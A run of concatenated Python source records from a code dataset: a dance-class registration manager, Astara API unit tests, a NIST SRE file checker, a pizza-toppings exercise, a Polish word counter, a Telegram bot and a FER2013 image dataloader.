enumerate(Payment): \r\n if Pval == 'NONE':\r\n searchfor = ['B','C']\r\n inxB = alldata['Bank or cash?'].str.contains('|'.join(searchfor))==True\r\n inxB = inxB==False\r\n else: \r\n inxB = alldata['Bank or cash?'].str.contains(Pval)==True\r\n fi = [i for i,j in enumerate(inxT[-1]) if j==True & inxB[i]==True] \r\n # check amount of Couples in this list\r\n amC = sum(alldata['Role(s)'][fi].str.contains('Couple')==True) \r\n TotPeople = len(fi)+amC\r\n \r\n ar = list(alldata['Amount'][fi])\r\n if len(ar)==1:\r\n try:\r\n float(ar)\r\n arF = [float(ar),0]\r\n except:\r\n arF = [0,0] \r\n elif len(ar)> 1:\r\n arIx = np.char.isnumeric(ar)\r\n arF = [float(i) for indx,i in enumerate(ar) if arIx[indx] == True]\r\n else:\r\n arF = [0,0]\r\n \r\n TotAmount.append(sum(arF))\r\n val['values'][Rcnt].append(float(TotPeople)) \r\n val['values'][len(Reg)+Rcnt+4].append(TotAmount[-1]) \r\n val['values'][len(Reg)*2+5] = ['Total', sum(TotAmount)/2] # divided by to as also all is added \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!J4:O20',\r\n valueInputOption = 'RAW', body = val).execute()\r\n \r\n return relout \r\n\r\n#%% check and send the confirmation email and update sheet, send waiting list if needed\r\ndef checkRolesConfirmation(SheetA, nameSht, alldata, sumDat, EmServ): \r\n dfsel = pd.DataFrame(alldata[alldata['Confirmation sent?'].str.contains('no') == True])\r\n # prefill confirmed as none\r\n dfsel.loc[:,'Confirmed as'] = 'none'\r\n \r\n # go row by row to check if there is space\r\n # ambis get assign at a later point, not yet \r\n NoElLeft = False\r\n cnt = 0\r\n newSumDat = {}\r\n while NoElLeft == False and len(dfsel)>0:\r\n dfinx = dfsel.index\r\n # define couples including ambi couples\r\n newSumDat = {}\r\n newSumDat['ExtraRole'] = sumDat['ExtraRole']\r\n if (sumDat['Ambis'] < sumDat['Extras']):\r\n # not enough ambis to fill the extras\r\n newSumDat['Extras'] = sumDat['Extras']-sumDat['Ambis']\r\n newSumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+sumDat['Ambis']\r\n elif (sumDat['Ambis'] == sumDat['Extras']):\r\n # same amount of amis as extras:\r\n newSumDat['Extras'] = 0\r\n newSumDat['ConfirmedCouples'] = 
sumDat['ConfirmedCouples']+sumDat['Ambis']\r\n elif (sumDat['Ambis'] > sumDat['Extras']):\r\n newSumDat['ExtraRole'] = 'Ambi'\r\n # more ambis than extras, the ambis themselves can form couples:\r\n ExtraAm = sumDat['Ambis']-sumDat['Extras']\r\n AmbiCoupl = int(np.floor(np.array(ExtraAm)/2))\r\n if ExtraAm % 2 == 1:\r\n newSumDat['Extras']=1 # only extra if odd number of ambis\r\n else:\r\n newSumDat['Extras']=0\r\n newSumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+AmbiCoupl+sumDat['Extras']\r\n # possible that we reach to too many couples. Control for that\r\n if newSumDat['ConfirmedCouples']>sumDat['MaxCouples']:\r\n newSumDat['Extras'] = newSumDat['Extras']+(newSumDat['ConfirmedCouples']-sumDat['MaxCouples'])*2\r\n newSumDat['ConfirmedCouples'] = sumDat['MaxCouples']\r\n \r\n # go through single person\r\n inxV = dfinx[cnt]\r\n Role = dfsel['Role(s)'][inxV]\r\n \r\n # class full, so no need to check anymore\r\n if (newSumDat['ConfirmedCouples'] >= sumDat['MaxCouples']) and (newSumDat['Extras'] >= sumDat['MaxExtras']):\r\n NoElLeft = True\r\n \r\n # go through all options\r\n if 'no' in dfsel['Confirmation sent?'][inxV]: \r\n # couples\r\n if ('Couple' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n # couple can be added as there are less than max couples\r\n sumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Couple')\r\n cnt = cnt+1 # go to next, as this doesn't help people earlier on the list\r\n elif ('Couple' in Role) and (newSumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # couple cannot be added as max couples reached\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL COUPLES FULL', True)\r\n cnt = cnt+1 # go to next, as this doesn't help people earlier on the list\r\n \r\n # ambis\r\n elif ('Ambi' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n # ambis can always join if the couples are not full\r\n sumDat['Ambis'] = sumDat['Ambis']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Ambi')\r\n cnt = 0 # this could help other people in list\r\n elif ('Ambi' in Role) and (newSumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # if couples full ambis can only join if the amount of extras is not yet full\r\n if newSumDat['Extras'] < sumDat['MaxExtras']:\r\n sumDat['Ambis'] = sumDat['Ambis']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Ambi')\r\n cnt = 0 # might have influence on amount of couples/extras\r\n else:\r\n # if ambi cannot be added anymore, then nobody can be added anymore\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL ALL FULL', True)\r\n NoElLeft = True\r\n \r\n # follows\r\n elif ('Follow' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n if (sumDat['ExtraRole'] == 'Lead') and (sumDat['Extras'] > 0):\r\n # follow can be added as enough space for new couple + extra leads\r\n sumDat['Extras'] = sumDat['Extras']-1\r\n sumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = 0 # could be that in list was a leader that can now be added\r\n elif sumDat['Extras'] == 0: \r\n # follow can be added as enough space for new couple + no extras\r\n sumDat['Extras'] = 1\r\n sumDat['ExtraRole'] = 'Follow'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = 0 # could help an ambi\r\n elif (sumDat['ExtraRole'] == 'Follow') and (newSumDat['Extras'] < sumDat['MaxExtras']): \r\n # follow can be added as not yet max amount of extra follows\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n 
dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = 0 # could help an ambi\r\n else:\r\n # follow cannot be added, max of extra follows reached\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA FOLLOW', True)\r\n cnt = cnt+1\r\n elif ('Follow' in Role) and (sumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # couples are full, Follow can be added as extra\r\n if (newSumDat['Extras'] == 0):\r\n sumDat['Extras'] = sumDat['Extras'] + 1\r\n sumDat['ExtraRole'] = 'Follow'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = cnt + 1 # this doesn't help people earlier on the list\r\n elif (sumDat['ExtraRole'] == 'Follow') and (newSumDat['Extras'] < sumDat['MaxExtras']):\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow') \r\n cnt = cnt+1 # this doesn't help people earlier on the list\r\n else:\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA FOLLOW', True)\r\n # nobody can be added anymore:\r\n NoElLeft = True\r\n \r\n # leads\r\n elif ('Lead' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n if (sumDat['ExtraRole'] == 'Follow') and (sumDat['Extras'] > 0):\r\n # lead can be added as enough space for new couple + extra follows\r\n sumDat['Extras'] = sumDat['Extras']-1\r\n sumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = 0 # could be that in list was a follow that can now be added\r\n elif sumDat['Extras'] == 0: \r\n # lead can be added as enough space for new couple + no extras\r\n sumDat['Extras'] = 1\r\n sumDat['ExtraRole'] = 'Lead'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = 0 # could help an ambi\r\n elif (sumDat['ExtraRole'] == 'Lead') and (newSumDat['Extras'] < sumDat['MaxExtras']): \r\n # lead can be added as not yet max amount of extra leads\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = 0 # could help an ambi\r\n else:\r\n # lead cannot be added, max of extra lead reached\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA LEADS', True)\r\n cnt = cnt+1\r\n elif ('Lead' in Role) and (sumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # couples are full, Lead can be added as extra\r\n if (newSumDat['Extras'] == 0):\r\n sumDat['Extras'] = sumDat['Extras'] + 1\r\n sumDat['ExtraRole'] = 'Lead'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = cnt + 1 # this doesn't help people earlier on the list\r\n elif (sumDat['ExtraRole'] == 'Lead') and (newSumDat['Extras'] < sumDat['MaxExtras']):\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = cnt+1 # this doesn't help people earlier on the list\r\n else:\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA LEAD', True)\r\n # nobody can be added anymore:\r\n NoElLeft = True \r\n else:\r\n cnt = cnt+1\r\n else:\r\n cnt = cnt+1 \r\n if cnt == len(dfinx):\r\n NoElLeft = True\r\n \r\n dfsel.loc[dfsel[dfsel['Confirmed as'].str.contains('none') == True].index,'Waitlisted?'] = 'WL FULL'\r\n return dfsel, sumDat, newSumDat\r\n \r\n#%% random code not used atm\r\n# =============================================================================\r\n# RANGE = 'Sheet1!B2'\r\n# serv = openreadwrite()\r\n# readandprint(serv, SPREADSHEET_ID, 'A1:B2')\r\n# \r\n# #v = serv.spreadsheets().values().get(spreadsheetId=SPREADSHEET_ID, range=RANGE).execute()\r\n# bod = {\"values\": [[ 'getting wijntjes'], []]}\r\n# vn = 
serv.spreadsheets().values().update(spreadsheetId=SPREADSHEET_ID, range=RANGE, \r\n# valueInputOption = 'RAW', body = bod).execute()\r\n# \r\n# readandprint(serv, SPREADSHEET_ID, 'A1:B2')\r\n# =============================================================================\r\n","sub_path":"SOMREG_HighOrdSubFun.py","file_name":"SOMREG_HighOrdSubFun.py","file_ext":"py","file_size_in_byte":19605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"163934061","text":"import unittest\nimport socket\n\nfrom six.moves import range\nfrom cliff import commandmanager\nimport mock\nfrom oslo_log import log\nimport webob\n\nfrom astara.api import rug\n\n\ntry:\n import blessed # noqa\n HAS_BLESSED = True\nexcept ImportError:\n HAS_BLESSED = False\n\n\nclass TestRugAPI(unittest.TestCase):\n\n def setUp(self):\n ctl = mock.Mock()\n ctl.return_value.command_manager = commandmanager.CommandManager(\n 'astara.cli'\n )\n self.api = rug.RugAPI(ctl)\n self.ctl = ctl.return_value\n\n @unittest.skipUnless(HAS_BLESSED, \"blessed not available\")\n def test_browse(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/browse/'\n }))\n assert isinstance(resp, webob.exc.HTTPNotImplemented)\n assert not self.ctl.run.called\n\n def test_ssh(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/ssh/ROUTER123/'\n }))\n assert isinstance(resp, webob.exc.HTTPNotImplemented)\n assert not self.ctl.run.called\n\n def test_poll(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/poll/'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'poll']\n )\n\n def test_missing_argument(self):\n # argparse failures (e.g., a missing router ID) raise a SystemExit\n # because cliff's behavior is to print a help message and sys.exit()\n self.ctl.run.side_effect = SystemExit\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/debug/'\n }))\n assert isinstance(resp, webob.exc.HTTPBadRequest)\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'debug']\n )\n\n def test_router_debug(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/debug/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'debug', 'ROUTER123']\n )\n\n def test_router_manage(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/manage/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'manage', 'ROUTER123']\n )\n\n def test_router_update(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/update/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'update', 'ROUTER123']\n )\n\n def test_router_rebuild(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/rebuild/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'rebuild', 'ROUTER123']\n )\n\n def test_tenant_debug(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/tenant/debug/TENANT123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'tenant', 'debug', 'TENANT123']\n )\n\n def test_tenant_manage(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/tenant/manage/TENANT123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'tenant', 'manage', 'TENANT123']\n )\n\n def test_workers_debug(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': 
'/workers/debug/'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'workers', 'debug']\n )\n\n def test_invalid_router_action(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/breakdance/ROUTER123'\n }))\n assert isinstance(resp, webob.exc.HTTPNotFound)\n assert not self.ctl.run.called\n\n def test_multiple_calls(self):\n for i in range(10):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/poll/'\n }))\n\n assert self.ctl.run.call_args_list == [\n mock.call(['--debug', 'poll'])\n for _ in range(10)\n ]\n\n def test_invalid_request_method(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'GET',\n 'PATH_INFO': '/poll/'\n }))\n assert isinstance(resp, webob.exc.HTTPMethodNotAllowed)\n assert not self.ctl.run.called\n\n\nclass TestRugAPIServer(unittest.TestCase):\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.wsgi')\n def test_bind_and_serve_ipv4(self, wsgi, listen):\n sock = listen.return_value\n server = rug.RugAPIServer()\n server.run('10.0.0.250', 44250)\n listen.assert_called_with(\n ('10.0.0.250', 44250),\n family=socket.AF_INET,\n backlog=128\n )\n args, kwargs = wsgi.server.call_args\n assert all([\n args[0] == sock,\n isinstance(args[1], rug.RugAPI),\n kwargs['custom_pool'] == server.pool,\n isinstance(kwargs['log'], log.KeywordArgumentAdapter)\n ])\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.wsgi')\n def test_bind_and_serve_ipv6(self, wsgi, listen):\n sock = listen.return_value\n server = rug.RugAPIServer()\n server.run('fdca:3ba5:a17a:acda::1', 44250)\n listen.assert_called_with(\n ('fdca:3ba5:a17a:acda::1', 44250),\n family=socket.AF_INET6,\n backlog=128\n )\n args, kwargs = wsgi.server.call_args\n assert all([\n args[0] == sock,\n isinstance(args[1], rug.RugAPI),\n kwargs['custom_pool'] == server.pool,\n isinstance(kwargs['log'], log.KeywordArgumentAdapter)\n ])\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.sleep', lambda x: None)\n def test_fail_to_bind(self, listen):\n listen.side_effect = socket.error(\n 99, \"Can't assign requested address\"\n )\n server = rug.RugAPIServer()\n self.assertRaises(\n RuntimeError,\n server.run,\n 'fdca:3ba5:a17a:acda::1',\n 44250,\n )\n assert listen.call_args_list == [\n mock.call(('fdca:3ba5:a17a:acda::1', 44250),\n family=socket.AF_INET6, backlog=128)\n for i in range(5)\n ]\n\n @mock.patch('eventlet.listen')\n @mock.patch('eventlet.wsgi')\n @mock.patch('eventlet.sleep', lambda x: None)\n def test_bind_fails_on_first_attempt(self, wsgi, listen):\n sock = mock.Mock()\n listen.side_effect = [\n socket.error(99, \"Can't assign requested address\"),\n sock\n ]\n server = rug.RugAPIServer()\n server.run('fdca:3ba5:a17a:acda::1', 44250)\n assert listen.call_args_list == [\n mock.call(('fdca:3ba5:a17a:acda::1', 44250),\n family=socket.AF_INET6, backlog=128)\n for i in range(2) # fails the first time, succeeds the second\n ]\n args, kwargs = wsgi.server.call_args\n assert all([\n args[0] == sock,\n isinstance(args[1], rug.RugAPI),\n kwargs['custom_pool'] == server.pool,\n isinstance(kwargs['log'], log.KeywordArgumentAdapter)\n ])\n","sub_path":"astara/test/unit/api/test_rug_api.py","file_name":"test_rug_api.py","file_ext":"py","file_size_in_byte":7538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"60422911","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Marc Ferras \n#\n# Copyright (C) 2012-2013 Idiap Research Institute, Martigny, Switzerland\n#\n# This 
program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n\n# Script to check that all filenames in all_files.lst exist in the filesystem.\n\nimport os.path\nimport sys\n\nfilelist = 'all_files.lst'\nprefix='DATABASE_DIRECTORY_PREFIX'\n\nif prefix=='DATABASE_DIRECTORY_PREFIX':\n print ('please replace variable ''prefix'' in script ''check-all-files-exist.py'' with the NIST SRE database directory in your system.')\n sys.exit(1)\n\next='.sph'\n\nstep = 2000\nok = 0\nnok = 0\nfileno = 0\nwith open(filelist) as fp:\n for fn in fp.readlines():\n fn = fn.strip()\n path = fn.split()[0]\n path = os.path.join(prefix,path+ext)\n fileno += 1\n if os.path.isfile(path):\n ok += 1\n else:\n nok += 1\n print ('file ' + path + ' not found. ' + str(nok) + ' incorrect paths')\n\n if fileno == step:\n print (str(fileno) + ' files checked')\n step += 2000\n\nif nok==0:\n print ('all files were found in the filesystem')\nelse:\n print (str(ok) + ' filenames found in the filesystem')\n print (str(nok) + ' filenames not found in the filesystem')\n","sub_path":"bob/db/nist_sre12/sre12/check-all-files-exist.py","file_name":"check-all-files-exist.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"50840346","text":"# Add toppings to a pizza\n# exercise 7-4\n\ntoppings_list = [] # List where the toppings are stored\n\nwhile True:\n topping = input(\"Enter the topping for your pizza(Quit for exit): \")\n\n if topping == 'quit':\n break\n else:\n toppings_list.append(topping)\n print(\"You will add that topping in your pizza!\")\n\nprint(\"Topping list\")\nprint(toppings_list)\n\n\n","sub_path":"Ejemplos/pizza_toppingsV2.py","file_name":"pizza_toppingsV2.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"184343174","text":"import re\nimport os\nimport reader\nimport time\n\nszkoda_ends = ['a', 'y', 'zie', 'ę', 'ą', 'o', 'om', 'ami', 'ach']\nwords = []\n\ndef proper(word):\n if word.lower() == 'szkód':\n return True\n elif word[5:] in szkoda_ends:\n return True\n return False\n\ndef find_szkoda(data):\n for text in data['items']:\n if not reader.in_2008(text):\n continue\n found = re.findall(r'\\b[Ss]zk[oó]d\\w{0,3}\\b', text['textContent'])\n\n for word in found:\n if proper(word):\n words.append(word)\n break\n\n\ndef main():\n path_to_json = 'C:/Users/Professional/Desktop/pjn/data/json'\n json_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\n for jfile in json_files:\n find_szkoda(reader.read_json(path_to_json + '/' + jfile))\n\n\nstart_time = time.time()\nmain()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nprint(len(words))\nprint(words)\n","sub_path":"pjn-lab1/szkoda.py","file_name":"szkoda.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"369349946","text":"\"\"\"Telegram bot based on python-telegram-bot with various commands.\"\"\"\n\nfrom telegram.ext import (CommandHandler, Filters,\n MessageHandler, CallbackQueryHandler)\nfrom datetime import time\n\nimport main.commands as commands\nfrom main import LOGGER, dispatcher, textfiltering, updater\nfrom main.helpers import error_callback, ping, db_backup\n\n\n# Bot commands\nUSERCOMMANDS = [\n 'Команды для рядовых пользователей',\n ('slap', commands.slap,\n 'Кого-то унизить (надо ответить жертве, чтобы бот понял кого бить)'),\n ('duel', commands.duel,\n 'Устроить дуэль (надо ответить тому, с кем будет дуэль)'),\n ('duelscore', commands.duelscore, 'Мой счёт в дуэлях'),\n ('duelranking', commands.duelranking,\n 'Ранкинг дуэлей чата (показывает только тех, у кого есть убийства и смерти)'),\n ('pidor', commands.pidor,\n 'Пидор дня (новый пидор каждый день по немецкому времени)'),\n ('pidorme', commands.pidorme, 'Сколько раз вы были пидором дня'),\n ('pidorstats', commands.pidorstats, 'Статы чата по пидорам дня'),\n (\"flip\", commands.flip, 'Бросить монетку (Орёл/Решка)'),\n (\"dadjoke\", commands.dadjoke, 'Случайная шутка бати'),\n (\"dog\", commands.animal, 'Случайное фото собачки'),\n (\"cat\", commands.animal, 'Случайное фото котика'),\n (\"help\", commands.bothelp, 'Меню помощи'),\n ('whatsnew', commands.whatsnew, 'Новое в боте'),\n ('adminmenu', commands.adminmenu, 'Админское меню'),\n]\nONLYADMINCOMMANDS = [\n 'Команды для администраторов групп',\n ('setcooldown', commands.setcooldown, 'Поставить новую задержку на команды'),\n ('duelstatus', commands.duelstatus, 'Включить/Выключить дуэли (on/off)'),\n ('immune', commands.immune,\n 'Добавить пользователю иммунитет на задержку команд (ответить ему)'),\n ('unimmune', commands.unimmune, 'Снять иммунитет (ответить или имя)'),\n ('immunelist', commands.immunelist, 'Лист людей с иммунитетом'),\n ('leave', commands.leave, 'Сказать боту уйти')\n]\nUNUSUALCOMMANDS = [\n 'Нечастые команды',\n ('allcommands', commands.allcommands, 'Все команды бота'),\n ('start', commands.start, 'Начальное сообщение бота'),\n ('getlogs', commands.getlogs,\n 'Получить логи бота (только для разработчика)'),\n ('getdatabase', commands.getdatabase, 'Получить датабазу'),\n ('promote', commands.promote, 'Хехехехе')\n]\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n LOGGER.info('Adding handlers...')\n # Add command handles\n for commandlists in (USERCOMMANDS, ONLYADMINCOMMANDS, UNUSUALCOMMANDS):\n for command in commandlists[1:]:\n dispatcher.add_handler(CommandHandler(\n command[0], command[1],\n filters=(~Filters.update.edited_message & Filters.command)))\n # Add message handlers\n dispatcher.add_handler(MessageHandler(\n (Filters.status_update.new_chat_members &\n ~Filters.update.edited_message), textfiltering.welcomer))\n dispatcher.add_handler(MessageHandler(\n (Filters.status_update.left_chat_member &\n ~Filters.update.edited_message), textfiltering.farewell))\n dispatcher.add_handler(MessageHandler(\n (Filters.text &\n ~Filters.update.edited_message), textfiltering.message_filter))\n # Add callback handlers\n dispatcher.add_handler(CallbackQueryHandler(commands.reroll,\n pattern='Reroll'))\n # Log errors\n dispatcher.add_error_handler(error_callback)\n # Add job queue\n updater.job_queue.run_repeating(\n callback=ping, interval=60 * 60, first=0)\n updater.job_queue.run_daily(\n callback=db_backup, time=time(0, 0, 0, 0))\n # Start polling\n updater.start_polling(clean=True)\n LOGGER.info('Polling started.')\n 
LOGGER.info('-----------------------------------------------')\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"thebot.py","file_name":"thebot.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"339558736","text":"# Imports\r\nimport torch\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torchvision import datasets, transforms\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom skimage import exposure\r\nfrom skimage.transform import resize as sk_resize\r\nimport warnings\r\nwarnings.filterwarnings('ignore', category=UserWarning)\r\n\r\n\r\n# Define the transforms for the training and validation sets\r\nBATCH_SIZE = 256\r\nDATA_DIR = \"../../fer2013/fer2013.csv\"\r\n\r\n\r\ndef get_dataloaders(batch_size=BATCH_SIZE, data_dir=DATA_DIR,\r\n chunksize=10000, resize=None, to_rgb=True, hist_eq=False, normalize=False):\r\n\r\n to_rgb = None\r\n chunksize = None\r\n resize = None\r\n hist_eq = None\r\n\r\n list_transforms = [transforms.ToTensor()]\r\n if normalize:\r\n list_transforms = list_transforms + [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\r\n data_transforms = {\r\n 'Training': transforms.Compose(list_transforms),\r\n 'PublicTest': transforms.Compose(list_transforms)\r\n }\r\n\r\n # Load the datasets with ImageFolder\r\n image_datasets = {\r\n x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x])\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n # Using the image datasets and the transforms, define the dataloaders\r\n dataloaders = {\r\n x: DataLoader(image_datasets[x], batch_size=batch_size, num_workers=4, shuffle=True)\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n return dataloaders\r\n\r\n\r\ndef get_dataloaders_fer48(data_dir, batch_size=BATCH_SIZE, chunksize=10000,\r\n resize=None, add_channel_dim=False, to_rgb=True, hist_eq=False, normalize=False):\r\n\r\n \"\"\"\r\n\r\n :param data_dir:\r\n :param batch_size:\r\n :param chunksize:\r\n :param transform:\r\n :return:\r\n \"\"\"\r\n\r\n class AddChannel(object):\r\n def __call__(self, im):\r\n return np.expand_dims(im, 2)\r\n\r\n class HistEq(object):\r\n def __call__(self, im):\r\n # res = AddChannel()(exposure.equalize_hist(im))\r\n return exposure.equalize_hist(im)\r\n\r\n class ToRGB(object):\r\n def __call__(self, im):\r\n if len(im.shape) < 3:\r\n im = np.expand_dims(im, 2)\r\n return np.repeat(im, 3, axis=2)\r\n\r\n class SkResize(object):\r\n def __init__(self, size):\r\n self.size = size\r\n\r\n def __call__(self, im, size=None):\r\n return sk_resize(im, self.size)\r\n\r\n data_transforms = [transforms.ToTensor()]\r\n if resize:\r\n # data_transforms = [transforms.Resize(resize)] + data_transforms\r\n data_transforms = [SkResize(resize)] + data_transforms\r\n if hist_eq:\r\n data_transforms.insert(1, HistEq())\r\n if to_rgb:\r\n data_transforms.insert(2, ToRGB())\r\n elif add_channel_dim:\r\n data_transforms.insert(2, AddChannel())\r\n elif to_rgb:\r\n data_transforms.insert(1, ToRGB())\r\n\r\n elif hist_eq:\r\n data_transforms = [HistEq()] + data_transforms\r\n if to_rgb:\r\n data_transforms.insert(1, ToRGB())\r\n elif add_channel_dim:\r\n data_transforms.insert(1, AddChannel())\r\n elif to_rgb:\r\n data_transforms = [ToRGB()] + data_transforms\r\n elif add_channel_dim:\r\n data_transforms = [AddChannel()] + data_transforms\r\n\r\n if normalize:\r\n data_transforms = data_transforms + [transforms.Normalize([0.485, 0.456, 
0.406], [0.229, 0.224, 0.225])]\r\n\r\n data_transforms = transforms.Compose(data_transforms)\r\n\r\n image_datasets = {\r\n x: FerDataset48(data_dir, x, chunksize, data_transforms)\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n # Using the image datasets and the transforms, define the dataloaders\r\n dataloaders = {\r\n x: DataLoader(image_datasets[x], batch_size=batch_size, num_workers=8, shuffle=True)\r\n for x in ['Training', 'PublicTest']\r\n }\r\n\r\n return dataloaders\r\n\r\n\r\nclass FerDataset48(Dataset):\r\n \"\"\"\r\n Custom pytorch dataset class implementation to load utk_face images\r\n \"\"\"\r\n\r\n def __init__(self, data_dir, flag, chunksize=20000, transform=None):\r\n \"\"\"\r\n\r\n :param root_dir:\r\n :param transform:\r\n \"\"\"\r\n self.data = self._read_csv(data_dir, chunksize, flag)\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n return self.data.shape[0]\r\n\r\n def __getitem__(self, idx):\r\n \"\"\"\r\n\r\n :param idx:\r\n :return:\r\n \"\"\"\r\n\r\n im = np.array([\r\n int(i) for i in self.data['pixels'].iloc[idx].split(' ')\r\n ]).reshape((48, 48))\r\n\r\n # lab = np.array(self.data['emotion'].iloc[idx]).reshape((1, 1)).astype(np.uint8)\r\n lab = np.array(self.data['emotion'].iloc[idx]).astype(np.uint8)\r\n\r\n im, lab = self.transform(im).to(torch.float32), torch.from_numpy(lab).long() # torch.from_numpy(lab).unsqueeze_(0)\r\n # print(im.dtype, im.size())\r\n # print(lab.dtype, lab.size())\r\n\r\n return im, lab\r\n\r\n def _read_csv(self, path_to_csv, chunksize, flag='Training'):\r\n chunks = pd.read_csv(path_to_csv, sep=',', chunksize=chunksize)\r\n list_chunks = []\r\n for chunk in chunks:\r\n mask = chunk['Usage'] == flag\r\n list_chunks.append(chunk.loc[mask])\r\n return pd.concat(list_chunks)\r\n\r\ndata_loader_lambda = {\r\n 'get_dataloaders_fer48': 